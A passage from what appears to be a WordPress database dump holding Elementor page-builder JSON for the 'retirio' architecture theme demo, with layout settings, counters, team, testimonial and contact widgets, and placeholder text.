us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\"},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3031,4742,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3032,4743,'_wp_page_template','elementor_header_footer'),(3033,4743,'_elementor_edit_mode','builder'),(3034,4743,'_elementor_template_type','wp-page'),(3035,4743,'_elementor_version','3.6.6'),(3036,4743,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 